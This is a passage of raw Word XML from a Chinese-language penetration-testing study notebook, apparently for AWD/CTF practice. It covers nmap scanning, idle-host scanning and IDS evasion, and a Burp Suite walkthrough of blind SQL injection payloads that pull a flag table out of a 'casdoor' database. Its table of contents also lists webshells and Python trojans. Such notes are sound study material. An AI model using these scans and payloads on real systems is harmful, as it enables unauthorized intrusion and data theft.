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928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"1-4"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_Toc7686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AWD</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7686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_Toc9034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一. Kali</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9034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_Toc20805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二. Nmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20805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_Toc26477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三. Zenmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26477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_Toc30809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四. Burp Suite</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30809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_Toc28760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1.代理设置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28760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_Toc22851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2.爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22851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_Toc30777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3.配合AntSword（中国蚁剑）文件上传</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30777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（一）文件类型验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26853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_Toc24111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（二）内容验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24111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_Toc22677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 后缀名验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22677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_Toc2563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 空字节截断目录路径</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2563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_Toc17801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 上传路径验证</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17801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_Toc20092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六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</w:rPr>
            <w:t>.htaccess文件绕过检测</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20092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_Toc16448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五. Joomla</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16448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六. Sqlmap</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18316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_Toc21652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七. Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21652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_Toc23204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1.SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23204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_Toc16168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2.命令执行漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16168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_Toc29428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（一）WSO2漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29428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_Toc9017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3.文件操作漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9017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_Toc8291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4.代码注入漏洞</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8291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_Toc27688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八. Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc27688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_Toc14205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python安全应用编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc14205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_Toc8253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（一）正则表达式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8253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_Toc16819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（二）Web编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16819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_Toc22114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（三）多线程(队列)</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22114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_Toc18579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（四）网络编程</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18579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_Toc20211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2.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Burp Suite基于python插件开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20211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_Toc7151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（一）环境配置</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc7151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_Toc28628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（二）Burp Suite使用Python脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28628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（三）自定义Burp Suite插件名称</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc29193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（四）自定义Burp Suite插件并引入到菜单项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9834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_Toc31288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（五）自定义Burp Suite插件获取cookies信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc31288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_Toc1581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（六）自定义Burp Suite插件使用官方文档提供方法</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1581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_Toc32166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（七）自定义Burp Suite插件完全删除所有相关项</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc32166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_Toc28901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（八）自定义Burp Suite插件获取HTTP请求信息</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28901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_Toc18200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（九）自定义Burp Suite插件获取HTTP和HTTPS的Host、Port、Protocol</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18200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_Toc15838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（十）自定义Burp Suite插件使用本地字典爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc15838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_Toc4576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（十一）自定义Burp Suite插件使用Python脚本处理过的本地字典内容爆破</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4576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（十二） 自定义Web服务&amp;快速找出IP地址泄露</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16267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_Toc357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3.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>Windows基于python木马脚本开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc357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（一）简单输出程序及静默化</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc17267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_Toc28135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（二）截图程序</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28135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_Toc18016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4.</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>python信息搜集工具开发</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc18016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_Toc30824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（一）高精度字典生成</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc30824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_Toc10020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（二）指纹识别</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10020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_Toc9957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九. IDA</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc9957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（一）基本操作</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13428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（二）汇编指令</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc4927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（三）ASCII码表</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc5799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_Toc19076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十. 通防</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19076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（一）PWN</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23643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_Toc10112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十一. Web代码审计</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10112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_Toc26953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（一）PHP</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26953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（二）Python</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2738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_Toc16604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（三）Java</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16604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十二. Diresearch</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8991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_Toc12861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十三. 一句话木马</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc12861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_Toc22177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十四. 手写SQL注入</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc22177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_Toc23021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（一）json传参形式</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc23021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_Toc3474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（二）时间盲注脚本</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc3474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_Toc19764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十五. Redis</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19764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十六. 杂七杂八的东西</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc1297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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc7686"/>
      <w:bookmarkStart w:id="1" w:name="_Toc22508"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>AWD</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/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" w:name="_Toc14106"/>
      <w:bookmarkStart w:id="3" w:name="_Toc9034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="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更新指令apt-get update &amp;&amp; apt-get upgrade &amp;&amp; apt-get dist-upgrade 或者：sudo apt-get update &amp;&amp; sudo apt-get upgrade &amp;&amp; sudo apt-get dist-upgrade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更换到root用户（已知密码）su root 之后输入密码即可 （未知密码）首先sudo passwd之后输入密码kali，然后设置两次一样的新密码，然后su root之后输入新密码即可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2240" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="屏幕截图 2023-06-17 21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06-17 2118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自带的数据库启动，先切换到root用户，mysql -u root -p，之后弹出框输入默认密码为kali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3920" cy="3101340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="99" name="图片 99" descr="屏幕截图 2023-07-03 22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3-07-03 22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读取文件指令：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>curl -X POST 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-d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url=路径名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67050"/>
            <wp:effectExtent l="0" t="0" r="14605" b="11430"/>
            <wp:docPr id="1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" w:name="_Toc6171"/>
      <w:bookmarkStart w:id="5" w:name="_Toc20805"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/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扫描：nmap IP地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3901440" cy="1478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端口及服务时根据规范表查询的，规范表在File System-usr-share-nmap文件夹里的nmap-service文件中，可以通过修改该规范表实现指定对照关系为规范查找</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLine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098675"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="12" name="图片 12" descr="屏幕截图 2023-06-18 1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06-18 1200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批量扫描端口1-30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3970020" cy="184404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扫描ip范围的所有端口，按回车会显示执行进度（Ping Scan Timing）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4640580" cy="29489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扫描文件中的IP范围nmap -iL list.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5036820" cy="294894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扫描出包括开启防火墙的端口nmap -F -P0 IP端口 --reason，这里-F是快速扫描（前100个高位端口），-P0实现带防火墙扫描，--reason显示扫描出来的原因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3000" cy="1988820"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="5" name="图片 5" descr="屏幕截图 2023-06-17 2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06-17 2102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扫描端口号范围（最大范围1-65535）nmap -P l-65535 IP地址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6700" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="屏幕截图 2023-06-17 2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06-17 2230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寻找空闲主机（僵尸主机）nmap -p80 -open -script ipidseq ip端口范围（-open代表开放状态空闲主机，这里我没有空闲主机）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140" cy="579120"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9" name="图片 9" descr="屏幕截图 2023-06-17 22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06-17 2245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或者全网扫描nmap -p80 -open -script ipidseq -iR 2000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3460" cy="3025140"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="10" name="图片 10" descr="屏幕截图 2023-06-17 22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06-17 2254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如果说扫出来了空闲主机（显示ipidseq为Incremental的就可以）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860" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="11" name="图片 11" descr="屏幕截图 2023-06-17 22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06-17 2254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利用空闲主机代替本机扫描（安全，不会暴露当前主机）nmap -Pn -sI 空闲主机IP 目标IP。这样目标主机抓包就只会显示空闲主机IP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扫描端口及版本号nmap -n -sV IP端口（查找对应的规范表是File System-usr-share-nmap文件夹中nmap-service-probes文件）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1851660"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="6" name="图片 6" descr="屏幕截图 2023-06-18 1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06-18 11515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扫描操作系统nmap -O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5840" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="13" name="图片 13" descr="屏幕截图 2023-06-18 16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06-18 1614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扫描全部信息nmap -A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26865" cy="4521835"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="17" name="图片 17" descr="屏幕截图 2023-06-18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6-18 1654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38295" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="6985" b="11430"/>
            <wp:docPr id="16" name="图片 16" descr="屏幕截图 2023-06-18 1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06-18 1654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7035" cy="4382770"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:docPr id="15" name="图片 15" descr="屏幕截图 2023-06-18 16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06-18 1653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逃逸防火墙以及IDS逃逸nmap --mtu 32 -F -v IP端口（-mtu指定便宜大小，-v提高输出详细度）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29100" cy="3360420"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="18" name="图片 18" descr="屏幕截图 2023-06-18 22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06-18 2244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保存结果到文件中nmap -F -oN 文件名 IP端口，可以保存为txt格式或者xml格式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556760"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2023-06-19 16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06-19 1653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保存结果到支持的所有格式文件中nmap -F -oA test IP端口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1600" cy="3451860"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="21" name="图片 21" descr="屏幕截图 2023-06-19 16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06-19 1657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保存结果到支某个文件后面nmap -F -append-output -oN 文件名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65680"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5080"/>
            <wp:docPr id="22" name="图片 22" descr="屏幕截图 2023-06-19 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6-19 1659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" w:name="_Toc30635"/>
      <w:bookmarkStart w:id="7" w:name="_Toc26477"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Zenmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/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扫描：在目标输入IP地址进行简单扫描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39085"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10795"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕截图 2023-06-19 16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06-19 16405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配置-编辑选中配置可以更改扫描配置，点击保存会自动在主页面命令中生成nmap指令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960370"/>
            <wp:effectExtent l="0" t="0" r="8890" b="11430"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2023-06-19 16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06-19 1646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" w:name="_Toc30809"/>
      <w:bookmarkStart w:id="9" w:name="_Toc5811"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/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0" w:name="_Toc781"/>
      <w:bookmarkStart w:id="11" w:name="_Toc28760"/>
      <w:bookmarkStart w:id="12" w:name="_Toc28705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</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10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代理设置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="1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打开软件，设置代理跟目标浏览器一致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21765"/>
            <wp:effectExtent l="0" t="0" r="1270" b="10795"/>
            <wp:docPr id="23" name="图片 23" descr="屏幕截图 2023-06-19 17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06-19 1748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3" w:name="_Toc12594"/>
      <w:bookmarkStart w:id="14" w:name="_Toc22851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2.爆破</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="1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将Intercept is on开启，这样浏览器访问网址会自动卡主，并在Burp Suite中监听到，之后点击Action-Send to Intruder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728845"/>
            <wp:effectExtent l="0" t="0" r="4445" b="10795"/>
            <wp:docPr id="24" name="图片 24" descr="屏幕截图 2023-06-19 17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19 1750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转到Intruder菜单的Positions，得到拦截信息，选中想要转换为payload爆破的地方，点击右侧Add按钮，会把选中项变为参数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41730"/>
            <wp:effectExtent l="0" t="0" r="6350" b="1270"/>
            <wp:docPr id="25" name="图片 25" descr="屏幕截图 2023-06-19 17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6-19 17570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之后在当前菜单的Payloads中，导入爆破文件，会将文件中所有内容依次作为参数值爆破并显示结果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58440"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="屏幕截图 2023-06-19 18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19 180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点击上面的Filter......可以对结果进行筛选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7075"/>
            <wp:effectExtent l="0" t="0" r="3175" b="14605"/>
            <wp:docPr id="27" name="图片 27" descr="屏幕截图 2023-06-19 18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19 1805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另外，点击Add from list...这里还有很多现有字典可供使用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3779520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="28" name="图片 28" descr="屏幕截图 2023-06-19 18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19 18120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SQL注入指令爆破，红色是爆破位置，加粗蓝色为标记位：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查个数：4个数据库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/api?field=(substring((select%20count(schema_name)%20from%20information_schema.schemata),1,1) = '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4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第4个数据库第1个字母：c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爆破出数据库为：casdoor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6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'casdoo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r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查表1名：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11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) = 'applicatio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n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查表2名：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a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'rol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e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查表4名：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'fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>g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查第一列列名：id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查第二列列名：flag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eastAsia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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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查询flag列数据：flag{b}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 group_concat(flag) from flag),§7§,1) = '§a§')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最后一个查询flag数据的时候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第一个变量为1-65个数字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第二个变量为"abcdefghijklmnopqrstuvwxyz0123456789_-!@#$^&amp;*()_+{}[]|\:";',./&lt;&gt;?"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多参数爆破要选择Cluster bomb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
